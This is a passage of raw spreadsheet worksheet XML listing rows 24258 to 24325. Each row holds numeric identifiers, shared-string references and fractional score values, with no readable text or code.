      <c r="C24258" s="2" t="s">
        <v>23364</v>
      </c>
      <c r="D24258" s="2">
        <v>1.0</v>
      </c>
      <c r="E24258" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24258" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24259" ht="15.75" customHeight="1">
      <c r="A24259" s="1">
        <v>30468.0</v>
      </c>
      <c r="B24259" s="2">
        <v>3.9536275E7</v>
      </c>
      <c r="C24259" s="2" t="s">
        <v>23365</v>
      </c>
      <c r="D24259" s="2">
        <v>1.0</v>
      </c>
      <c r="E24259" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24259" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24260" ht="15.75" customHeight="1">
      <c r="A24260" s="1">
        <v>31071.0</v>
      </c>
      <c r="B24260" s="2">
        <v>4.8228696E7</v>
      </c>
      <c r="C24260" s="2" t="s">
        <v>23366</v>
      </c>
      <c r="D24260" s="2">
        <v>1.0</v>
      </c>
      <c r="E24260" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24260" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24261" ht="15.75" customHeight="1">
      <c r="A24261" s="1">
        <v>31111.0</v>
      </c>
      <c r="B24261" s="2">
        <v>4.8682132E7</v>
      </c>
      <c r="C24261" s="2" t="s">
        <v>23367</v>
      </c>
      <c r="D24261" s="2">
        <v>1.0</v>
      </c>
      <c r="E24261" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24261" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24262" ht="15.75" customHeight="1">
      <c r="A24262" s="1">
        <v>31120.0</v>
      </c>
      <c r="B24262" s="2">
        <v>4883631.0</v>
      </c>
      <c r="C24262" s="2" t="s">
        <v>23335</v>
      </c>
      <c r="D24262" s="2">
        <v>1.0</v>
      </c>
      <c r="E24262" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24262" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24263" ht="15.75" customHeight="1">
      <c r="A24263" s="1">
        <v>31240.0</v>
      </c>
      <c r="B24263" s="2">
        <v>4.928977E7</v>
      </c>
      <c r="C24263" s="2" t="s">
        <v>23368</v>
      </c>
      <c r="D24263" s="2">
        <v>1.0</v>
      </c>
      <c r="E24263" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24263" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24264" ht="15.75" customHeight="1">
      <c r="A24264" s="1">
        <v>31289.0</v>
      </c>
      <c r="B24264" s="2">
        <v>4962052.0</v>
      </c>
      <c r="C24264" s="2" t="s">
        <v>23369</v>
      </c>
      <c r="D24264" s="2">
        <v>1.0</v>
      </c>
      <c r="E24264" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24264" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24265" ht="15.75" customHeight="1">
      <c r="A24265" s="1">
        <v>31381.0</v>
      </c>
      <c r="B24265" s="2">
        <v>4998035.0</v>
      </c>
      <c r="C24265" s="2" t="s">
        <v>23370</v>
      </c>
      <c r="D24265" s="2">
        <v>1.0</v>
      </c>
      <c r="E24265" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24265" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24266" ht="15.75" customHeight="1">
      <c r="A24266" s="1">
        <v>31820.0</v>
      </c>
      <c r="B24266" s="2">
        <v>5252596.0</v>
      </c>
      <c r="C24266" s="2" t="s">
        <v>23371</v>
      </c>
      <c r="D24266" s="2">
        <v>1.0</v>
      </c>
      <c r="E24266" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24266" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24267" ht="15.75" customHeight="1">
      <c r="A24267" s="1">
        <v>32029.0</v>
      </c>
      <c r="B24267" s="2">
        <v>5361041.0</v>
      </c>
      <c r="C24267" s="2" t="s">
        <v>23372</v>
      </c>
      <c r="D24267" s="2">
        <v>1.0</v>
      </c>
      <c r="E24267" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24267" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24268" ht="15.75" customHeight="1">
      <c r="A24268" s="1">
        <v>32284.0</v>
      </c>
      <c r="B24268" s="2">
        <v>5536232.0</v>
      </c>
      <c r="C24268" s="2" t="s">
        <v>23373</v>
      </c>
      <c r="D24268" s="2">
        <v>1.0</v>
      </c>
      <c r="E24268" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24268" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24269" ht="15.75" customHeight="1">
      <c r="A24269" s="1">
        <v>32672.0</v>
      </c>
      <c r="B24269" s="2">
        <v>5933304.0</v>
      </c>
      <c r="C24269" s="2" t="s">
        <v>23374</v>
      </c>
      <c r="D24269" s="2">
        <v>1.0</v>
      </c>
      <c r="E24269" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24269" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24270" ht="15.75" customHeight="1">
      <c r="A24270" s="1">
        <v>32735.0</v>
      </c>
      <c r="B24270" s="2">
        <v>6014998.0</v>
      </c>
      <c r="C24270" s="2" t="s">
        <v>23371</v>
      </c>
      <c r="D24270" s="2">
        <v>1.0</v>
      </c>
      <c r="E24270" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24270" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24271" ht="15.75" customHeight="1">
      <c r="A24271" s="1">
        <v>33797.0</v>
      </c>
      <c r="B24271" s="2">
        <v>8795983.0</v>
      </c>
      <c r="C24271" s="2" t="s">
        <v>23345</v>
      </c>
      <c r="D24271" s="2">
        <v>1.0</v>
      </c>
      <c r="E24271" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24271" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24272" ht="15.75" customHeight="1">
      <c r="A24272" s="1">
        <v>33998.0</v>
      </c>
      <c r="B24272" s="2">
        <v>9456521.0</v>
      </c>
      <c r="C24272" s="2" t="s">
        <v>23342</v>
      </c>
      <c r="D24272" s="2">
        <v>1.0</v>
      </c>
      <c r="E24272" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24272" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24273" ht="15.75" customHeight="1">
      <c r="A24273" s="1">
        <v>34038.0</v>
      </c>
      <c r="B24273" s="2">
        <v>9567498.0</v>
      </c>
      <c r="C24273" s="2" t="s">
        <v>23375</v>
      </c>
      <c r="D24273" s="2">
        <v>1.0</v>
      </c>
      <c r="E24273" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24273" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24274" ht="15.75" customHeight="1">
      <c r="A24274" s="1">
        <v>34147.0</v>
      </c>
      <c r="B24274" s="2">
        <v>9849857.0</v>
      </c>
      <c r="C24274" s="2" t="s">
        <v>23376</v>
      </c>
      <c r="D24274" s="2">
        <v>1.0</v>
      </c>
      <c r="E24274" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24274" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="24275" ht="15.75" customHeight="1">
      <c r="A24275" s="1">
        <v>14761.0</v>
      </c>
      <c r="B24275" s="2">
        <v>4.0824534E7</v>
      </c>
      <c r="C24275" s="2" t="s">
        <v>23377</v>
      </c>
      <c r="D24275" s="2">
        <v>1.0</v>
      </c>
      <c r="E24275" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24275" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="24276" ht="15.75" customHeight="1">
      <c r="A24276" s="1">
        <v>33477.0</v>
      </c>
      <c r="B24276" s="2">
        <v>7994162.0</v>
      </c>
      <c r="C24276" s="2" t="s">
        <v>23378</v>
      </c>
      <c r="D24276" s="2">
        <v>1.0</v>
      </c>
      <c r="E24276" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24276" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="24277" ht="15.75" customHeight="1">
      <c r="A24277" s="1">
        <v>34127.0</v>
      </c>
      <c r="B24277" s="2">
        <v>9776571.0</v>
      </c>
      <c r="C24277" s="2" t="s">
        <v>23379</v>
      </c>
      <c r="D24277" s="2">
        <v>1.0</v>
      </c>
      <c r="E24277" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24277" s="2">
        <v>0.1162551440329218</v>
      </c>
    </row>
    <row r="24278" ht="15.75" customHeight="1">
      <c r="A24278" s="1">
        <v>17775.0</v>
      </c>
      <c r="B24278" s="2">
        <v>5.0765244E7</v>
      </c>
      <c r="C24278" s="2" t="s">
        <v>23380</v>
      </c>
      <c r="D24278" s="2">
        <v>1.0</v>
      </c>
      <c r="E24278" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24278" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="24279" ht="15.75" customHeight="1">
      <c r="A24279" s="1">
        <v>25879.0</v>
      </c>
      <c r="B24279" s="2">
        <v>1.4962317E7</v>
      </c>
      <c r="C24279" s="2" t="s">
        <v>23243</v>
      </c>
      <c r="D24279" s="2">
        <v>1.0</v>
      </c>
      <c r="E24279" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24279" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="24280" ht="15.75" customHeight="1">
      <c r="A24280" s="1">
        <v>26559.0</v>
      </c>
      <c r="B24280" s="2">
        <v>1.7803591E7</v>
      </c>
      <c r="C24280" s="2" t="s">
        <v>23381</v>
      </c>
      <c r="D24280" s="2">
        <v>1.0</v>
      </c>
      <c r="E24280" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24280" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="24281" ht="15.75" customHeight="1">
      <c r="A24281" s="1">
        <v>31102.0</v>
      </c>
      <c r="B24281" s="2">
        <v>4.8587866E7</v>
      </c>
      <c r="C24281" s="2" t="s">
        <v>23382</v>
      </c>
      <c r="D24281" s="2">
        <v>1.0</v>
      </c>
      <c r="E24281" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24281" s="2">
        <v>0.1161616161616161</v>
      </c>
    </row>
    <row r="24282" ht="15.75" customHeight="1">
      <c r="A24282" s="1">
        <v>6702.0</v>
      </c>
      <c r="B24282" s="2">
        <v>4.9216765E7</v>
      </c>
      <c r="C24282" s="2" t="s">
        <v>23383</v>
      </c>
      <c r="D24282" s="2">
        <v>1.0</v>
      </c>
      <c r="E24282" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24282" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="24283" ht="15.75" customHeight="1">
      <c r="A24283" s="1">
        <v>18516.0</v>
      </c>
      <c r="B24283" s="2">
        <v>5.2995376E7</v>
      </c>
      <c r="C24283" s="2" t="s">
        <v>23384</v>
      </c>
      <c r="D24283" s="2">
        <v>1.0</v>
      </c>
      <c r="E24283" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24283" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="24284" ht="15.75" customHeight="1">
      <c r="A24284" s="1">
        <v>26152.0</v>
      </c>
      <c r="B24284" s="2">
        <v>1.6082638E7</v>
      </c>
      <c r="C24284" s="2" t="s">
        <v>23385</v>
      </c>
      <c r="D24284" s="2">
        <v>1.0</v>
      </c>
      <c r="E24284" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24284" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="24285" ht="15.75" customHeight="1">
      <c r="A24285" s="1">
        <v>30048.0</v>
      </c>
      <c r="B24285" s="2">
        <v>3.6241808E7</v>
      </c>
      <c r="C24285" s="2" t="s">
        <v>23386</v>
      </c>
      <c r="D24285" s="2">
        <v>1.0</v>
      </c>
      <c r="E24285" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24285" s="2">
        <v>0.1160714285714285</v>
      </c>
    </row>
    <row r="24286" ht="15.75" customHeight="1">
      <c r="A24286" s="1">
        <v>21867.0</v>
      </c>
      <c r="B24286" s="2">
        <v>2.7430621E7</v>
      </c>
      <c r="C24286" s="2" t="s">
        <v>23387</v>
      </c>
      <c r="D24286" s="2">
        <v>1.0</v>
      </c>
      <c r="E24286" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24286" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="24287" ht="15.75" customHeight="1">
      <c r="A24287" s="1">
        <v>27130.0</v>
      </c>
      <c r="B24287" s="2">
        <v>2.0743536E7</v>
      </c>
      <c r="C24287" s="2" t="s">
        <v>23388</v>
      </c>
      <c r="D24287" s="2">
        <v>1.0</v>
      </c>
      <c r="E24287" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24287" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="24288" ht="15.75" customHeight="1">
      <c r="A24288" s="1">
        <v>28584.0</v>
      </c>
      <c r="B24288" s="2">
        <v>2.6933153E7</v>
      </c>
      <c r="C24288" s="2" t="s">
        <v>23389</v>
      </c>
      <c r="D24288" s="2">
        <v>1.0</v>
      </c>
      <c r="E24288" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24288" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="24289" ht="15.75" customHeight="1">
      <c r="A24289" s="1">
        <v>30576.0</v>
      </c>
      <c r="B24289" s="2">
        <v>4.1083439E7</v>
      </c>
      <c r="C24289" s="2" t="s">
        <v>23390</v>
      </c>
      <c r="D24289" s="2">
        <v>1.0</v>
      </c>
      <c r="E24289" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24289" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="24290" ht="15.75" customHeight="1">
      <c r="A24290" s="1">
        <v>31250.0</v>
      </c>
      <c r="B24290" s="2">
        <v>4937154.0</v>
      </c>
      <c r="C24290" s="2" t="s">
        <v>23391</v>
      </c>
      <c r="D24290" s="2">
        <v>1.0</v>
      </c>
      <c r="E24290" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24290" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="24291" ht="15.75" customHeight="1">
      <c r="A24291" s="1">
        <v>31263.0</v>
      </c>
      <c r="B24291" s="2">
        <v>4942565.0</v>
      </c>
      <c r="C24291" s="2" t="s">
        <v>23392</v>
      </c>
      <c r="D24291" s="2">
        <v>1.0</v>
      </c>
      <c r="E24291" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24291" s="2">
        <v>0.1159844054580897</v>
      </c>
    </row>
    <row r="24292" ht="15.75" customHeight="1">
      <c r="A24292" s="1">
        <v>20211.0</v>
      </c>
      <c r="B24292" s="2">
        <v>1.0684496E7</v>
      </c>
      <c r="C24292" s="2" t="s">
        <v>23393</v>
      </c>
      <c r="D24292" s="2">
        <v>1.0</v>
      </c>
      <c r="E24292" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24292" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="24293" ht="15.75" customHeight="1">
      <c r="A24293" s="1">
        <v>26685.0</v>
      </c>
      <c r="B24293" s="2">
        <v>1.8113366E7</v>
      </c>
      <c r="C24293" s="2" t="s">
        <v>23394</v>
      </c>
      <c r="D24293" s="2">
        <v>1.0</v>
      </c>
      <c r="E24293" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24293" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="24294" ht="15.75" customHeight="1">
      <c r="A24294" s="1">
        <v>33380.0</v>
      </c>
      <c r="B24294" s="2">
        <v>7648177.0</v>
      </c>
      <c r="C24294" s="2" t="s">
        <v>23395</v>
      </c>
      <c r="D24294" s="2">
        <v>1.0</v>
      </c>
      <c r="E24294" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24294" s="2">
        <v>0.1159003831417625</v>
      </c>
    </row>
    <row r="24295" ht="15.75" customHeight="1">
      <c r="A24295" s="1">
        <v>30190.0</v>
      </c>
      <c r="B24295" s="2">
        <v>3.7228267E7</v>
      </c>
      <c r="C24295" s="2" t="s">
        <v>23396</v>
      </c>
      <c r="D24295" s="2">
        <v>1.0</v>
      </c>
      <c r="E24295" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24295" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="24296" ht="15.75" customHeight="1">
      <c r="A24296" s="1">
        <v>31932.0</v>
      </c>
      <c r="B24296" s="2">
        <v>5305124.0</v>
      </c>
      <c r="C24296" s="2" t="s">
        <v>23397</v>
      </c>
      <c r="D24296" s="2">
        <v>1.0</v>
      </c>
      <c r="E24296" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24296" s="2">
        <v>0.1159003831417624</v>
      </c>
    </row>
    <row r="24297" ht="15.75" customHeight="1">
      <c r="A24297" s="1">
        <v>23330.0</v>
      </c>
      <c r="B24297" s="2">
        <v>5.4639759E7</v>
      </c>
      <c r="C24297" s="2" t="s">
        <v>23398</v>
      </c>
      <c r="D24297" s="2">
        <v>1.0</v>
      </c>
      <c r="E24297" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24297" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="24298" ht="15.75" customHeight="1">
      <c r="A24298" s="1">
        <v>27409.0</v>
      </c>
      <c r="B24298" s="2">
        <v>2.1815326E7</v>
      </c>
      <c r="C24298" s="2" t="s">
        <v>23399</v>
      </c>
      <c r="D24298" s="2">
        <v>1.0</v>
      </c>
      <c r="E24298" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24298" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="24299" ht="15.75" customHeight="1">
      <c r="A24299" s="1">
        <v>27991.0</v>
      </c>
      <c r="B24299" s="2">
        <v>2.4151266E7</v>
      </c>
      <c r="C24299" s="2" t="s">
        <v>23188</v>
      </c>
      <c r="D24299" s="2">
        <v>1.0</v>
      </c>
      <c r="E24299" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24299" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="24300" ht="15.75" customHeight="1">
      <c r="A24300" s="1">
        <v>28767.0</v>
      </c>
      <c r="B24300" s="2">
        <v>2.8373774E7</v>
      </c>
      <c r="C24300" s="2" t="s">
        <v>23400</v>
      </c>
      <c r="D24300" s="2">
        <v>1.0</v>
      </c>
      <c r="E24300" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24300" s="2">
        <v>0.115819209039548</v>
      </c>
    </row>
    <row r="24301" ht="15.75" customHeight="1">
      <c r="A24301" s="1">
        <v>6932.0</v>
      </c>
      <c r="B24301" s="2">
        <v>4.9881316E7</v>
      </c>
      <c r="C24301" s="2" t="s">
        <v>23401</v>
      </c>
      <c r="D24301" s="2">
        <v>1.0</v>
      </c>
      <c r="E24301" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24301" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="24302" ht="15.75" customHeight="1">
      <c r="A24302" s="1">
        <v>14774.0</v>
      </c>
      <c r="B24302" s="2">
        <v>4.0871083E7</v>
      </c>
      <c r="C24302" s="2" t="s">
        <v>23402</v>
      </c>
      <c r="D24302" s="2">
        <v>1.0</v>
      </c>
      <c r="E24302" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24302" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="24303" ht="15.75" customHeight="1">
      <c r="A24303" s="1">
        <v>19248.0</v>
      </c>
      <c r="B24303" s="2">
        <v>5.5112824E7</v>
      </c>
      <c r="C24303" s="2" t="s">
        <v>23403</v>
      </c>
      <c r="D24303" s="2">
        <v>1.0</v>
      </c>
      <c r="E24303" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24303" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="24304" ht="15.75" customHeight="1">
      <c r="A24304" s="1">
        <v>23293.0</v>
      </c>
      <c r="B24304" s="2">
        <v>5387913.0</v>
      </c>
      <c r="C24304" s="2" t="s">
        <v>23404</v>
      </c>
      <c r="D24304" s="2">
        <v>1.0</v>
      </c>
      <c r="E24304" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24304" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="24305" ht="15.75" customHeight="1">
      <c r="A24305" s="1">
        <v>29692.0</v>
      </c>
      <c r="B24305" s="2">
        <v>3.4203297E7</v>
      </c>
      <c r="C24305" s="2" t="s">
        <v>23405</v>
      </c>
      <c r="D24305" s="2">
        <v>1.0</v>
      </c>
      <c r="E24305" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24305" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="24306" ht="15.75" customHeight="1">
      <c r="A24306" s="1">
        <v>31524.0</v>
      </c>
      <c r="B24306" s="2">
        <v>5.0850027E7</v>
      </c>
      <c r="C24306" s="2" t="s">
        <v>23406</v>
      </c>
      <c r="D24306" s="2">
        <v>1.0</v>
      </c>
      <c r="E24306" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24306" s="2">
        <v>0.1157407407407407</v>
      </c>
    </row>
    <row r="24307" ht="15.75" customHeight="1">
      <c r="A24307" s="1">
        <v>21857.0</v>
      </c>
      <c r="B24307" s="2">
        <v>2.7231015E7</v>
      </c>
      <c r="C24307" s="2" t="s">
        <v>23407</v>
      </c>
      <c r="D24307" s="2">
        <v>1.0</v>
      </c>
      <c r="E24307" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24307" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="24308" ht="15.75" customHeight="1">
      <c r="A24308" s="1">
        <v>24386.0</v>
      </c>
      <c r="B24308" s="2">
        <v>1.0782107E7</v>
      </c>
      <c r="C24308" s="2" t="s">
        <v>23408</v>
      </c>
      <c r="D24308" s="2">
        <v>1.0</v>
      </c>
      <c r="E24308" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24308" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="24309" ht="15.75" customHeight="1">
      <c r="A24309" s="1">
        <v>24547.0</v>
      </c>
      <c r="B24309" s="2">
        <v>1.1259073E7</v>
      </c>
      <c r="C24309" s="2" t="s">
        <v>23409</v>
      </c>
      <c r="D24309" s="2">
        <v>1.0</v>
      </c>
      <c r="E24309" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24309" s="2">
        <v>0.1156648451730419</v>
      </c>
    </row>
    <row r="24310" ht="15.75" customHeight="1">
      <c r="A24310" s="1">
        <v>1049.0</v>
      </c>
      <c r="B24310" s="2">
        <v>2.3404321E7</v>
      </c>
      <c r="C24310" s="2" t="s">
        <v>23410</v>
      </c>
      <c r="D24310" s="2">
        <v>1.0</v>
      </c>
      <c r="E24310" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24310" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="24311" ht="15.75" customHeight="1">
      <c r="A24311" s="1">
        <v>13498.0</v>
      </c>
      <c r="B24311" s="2">
        <v>3.541985E7</v>
      </c>
      <c r="C24311" s="2" t="s">
        <v>23411</v>
      </c>
      <c r="D24311" s="2">
        <v>1.0</v>
      </c>
      <c r="E24311" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24311" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="24312" ht="15.75" customHeight="1">
      <c r="A24312" s="1">
        <v>21954.0</v>
      </c>
      <c r="B24312" s="2">
        <v>2.8924736E7</v>
      </c>
      <c r="C24312" s="2" t="s">
        <v>23412</v>
      </c>
      <c r="D24312" s="2">
        <v>1.0</v>
      </c>
      <c r="E24312" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24312" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="24313" ht="15.75" customHeight="1">
      <c r="A24313" s="1">
        <v>22756.0</v>
      </c>
      <c r="B24313" s="2">
        <v>4.4630612E7</v>
      </c>
      <c r="C24313" s="2" t="s">
        <v>23413</v>
      </c>
      <c r="D24313" s="2">
        <v>1.0</v>
      </c>
      <c r="E24313" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24313" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="24314" ht="15.75" customHeight="1">
      <c r="A24314" s="1">
        <v>25813.0</v>
      </c>
      <c r="B24314" s="2">
        <v>1.4761508E7</v>
      </c>
      <c r="C24314" s="2" t="s">
        <v>23414</v>
      </c>
      <c r="D24314" s="2">
        <v>1.0</v>
      </c>
      <c r="E24314" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24314" s="2">
        <v>0.1155913978494624</v>
      </c>
    </row>
    <row r="24315" ht="15.75" customHeight="1">
      <c r="A24315" s="1">
        <v>29130.0</v>
      </c>
      <c r="B24315" s="2">
        <v>3.0514548E7</v>
      </c>
      <c r="C24315" s="2" t="s">
        <v>23415</v>
      </c>
      <c r="D24315" s="2">
        <v>1.0</v>
      </c>
      <c r="E24315" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24315" s="2">
        <v>0.1154513888888889</v>
      </c>
    </row>
    <row r="24316" ht="15.75" customHeight="1">
      <c r="A24316" s="1">
        <v>4314.0</v>
      </c>
      <c r="B24316" s="2">
        <v>4.1996329E7</v>
      </c>
      <c r="C24316" s="2" t="s">
        <v>23416</v>
      </c>
      <c r="D24316" s="2">
        <v>1.0</v>
      </c>
      <c r="E24316" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24316" s="2">
        <v>0.1153846153846154</v>
      </c>
    </row>
    <row r="24317" ht="15.75" customHeight="1">
      <c r="A24317" s="1">
        <v>12239.0</v>
      </c>
      <c r="B24317" s="2">
        <v>2.7882189E7</v>
      </c>
      <c r="C24317" s="2" t="s">
        <v>23417</v>
      </c>
      <c r="D24317" s="2">
        <v>1.0</v>
      </c>
      <c r="E24317" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24317" s="2">
        <v>0.1150793650793651</v>
      </c>
    </row>
    <row r="24318" ht="15.75" customHeight="1">
      <c r="A24318" s="1">
        <v>32751.0</v>
      </c>
      <c r="B24318" s="2">
        <v>6053747.0</v>
      </c>
      <c r="C24318" s="2" t="s">
        <v>23418</v>
      </c>
      <c r="D24318" s="2">
        <v>1.0</v>
      </c>
      <c r="E24318" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24318" s="2">
        <v>0.1148648648648649</v>
      </c>
    </row>
    <row r="24319" ht="15.75" customHeight="1">
      <c r="A24319" s="1">
        <v>10393.0</v>
      </c>
      <c r="B24319" s="2">
        <v>9044754.0</v>
      </c>
      <c r="C24319" s="2" t="s">
        <v>23419</v>
      </c>
      <c r="D24319" s="2">
        <v>1.0</v>
      </c>
      <c r="E24319" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24319" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="24320" ht="15.75" customHeight="1">
      <c r="A24320" s="1">
        <v>30939.0</v>
      </c>
      <c r="B24320" s="2">
        <v>4.7264063E7</v>
      </c>
      <c r="C24320" s="2" t="s">
        <v>23420</v>
      </c>
      <c r="D24320" s="2">
        <v>1.0</v>
      </c>
      <c r="E24320" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24320" s="2">
        <v>0.1143162393162393</v>
      </c>
    </row>
    <row r="24321" ht="15.75" customHeight="1">
      <c r="A24321" s="1">
        <v>8805.0</v>
      </c>
      <c r="B24321" s="2">
        <v>5.4612686E7</v>
      </c>
      <c r="C24321" s="2" t="s">
        <v>23421</v>
      </c>
      <c r="D24321" s="2">
        <v>1.0</v>
      </c>
      <c r="E24321" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24321" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="24322" ht="15.75" customHeight="1">
      <c r="A24322" s="1">
        <v>12416.0</v>
      </c>
      <c r="B24322" s="2">
        <v>2.9118858E7</v>
      </c>
      <c r="C24322" s="2" t="s">
        <v>23422</v>
      </c>
      <c r="D24322" s="2">
        <v>1.0</v>
      </c>
      <c r="E24322" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24322" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="24323" ht="15.75" customHeight="1">
      <c r="A24323" s="1">
        <v>13336.0</v>
      </c>
      <c r="B24323" s="2">
        <v>3.46604E7</v>
      </c>
      <c r="C24323" s="2" t="s">
        <v>23423</v>
      </c>
      <c r="D24323" s="2">
        <v>1.0</v>
      </c>
      <c r="E24323" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24323" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="24324" ht="15.75" customHeight="1">
      <c r="A24324" s="1">
        <v>21145.0</v>
      </c>
      <c r="B24324" s="2">
        <v>1.8669121E7</v>
      </c>
      <c r="C24324" s="2" t="s">
        <v>23424</v>
      </c>
      <c r="D24324" s="2">
        <v>1.0</v>
      </c>
      <c r="E24324" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F24324" s="2">
        <v>0.1142557651991614</v>
      </c>
    </row>
    <row r="24325" ht="15.75" customHeight="1">
      <c r="A24325" s="1">
        <v>22292.0</v>
      </c>
      <c r="B24325" s="2">
        <v>3.3512334E7</v>
      </c>
      <c r="C24325" s="2" t="s">
        <v>23425</v>
      </c>
